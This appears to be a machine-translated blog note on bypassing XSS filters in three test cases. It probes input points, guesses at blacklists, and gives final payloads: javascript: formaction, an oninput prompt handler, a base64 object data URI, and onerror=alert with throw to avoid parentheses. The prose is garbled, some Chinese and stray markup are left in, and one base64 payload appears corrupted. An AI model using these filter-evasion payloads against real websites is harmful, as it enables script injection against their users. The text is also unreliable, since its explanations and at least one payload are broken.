Case number one
1, a simple input point 998 determines that the user-controllable.
2, special characters { "<>? / '} Is determined that the filter case.
3, the input tag is determined, the filter case events.
Probably regular blacklist.
Hazardous events combined with an equal sign on the filter.
src delete
alert back () is empty before filtration
Tag as long as the end character> direct filtration is empty
·······
4, the final Payload
Fuzzing an unfiltered events from action using accent ( ') Alternatively parentheses
"/><input type=”submit” formaction=Javascript:alert998//
Fuzzing出未过滤事件 oninput事件 <font color=red>利用浏览器特性补全标签
或者:
“><input type=”text” oninput=”prompt(998)”<
Case II
1, a simple input point 998 determines that the user-controllable
2, a portion of the escape character, the filter part of the label
3, fuzzing an object tag unfiltered
The final Payload
998"/<objectdata="data:text/html;base64,PHNjcmlwdD5hbGVydCg5OTgpPC9zY3JpcHQBIZ_PLUSFLAG">998<!--
Case III
parentheses and semicolons are filtered
1 Its working principle is to set the onerror handler function you want to call, the throw statement is used to pass parameters to a function:
payload:
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
onerror JavaScript exception will be created each time the handler is invoked, and the throw statement allows you to create custom expressions contained sent to the onerror handler exception. Because the throw is a statement, it usually takes onerror use semicolons to complete the assignment, in order to start a new statement instead of forming an expression.
2 as a throw statement accepts expression, so you can assign the onerror throw statement, and because the last part of the expression is transmitted to the onerror handler, it will call the function using the selected parameters
<script>throw onerror=alert,'some string',123,'haha'</script>
ps: some of the information from the Internet reference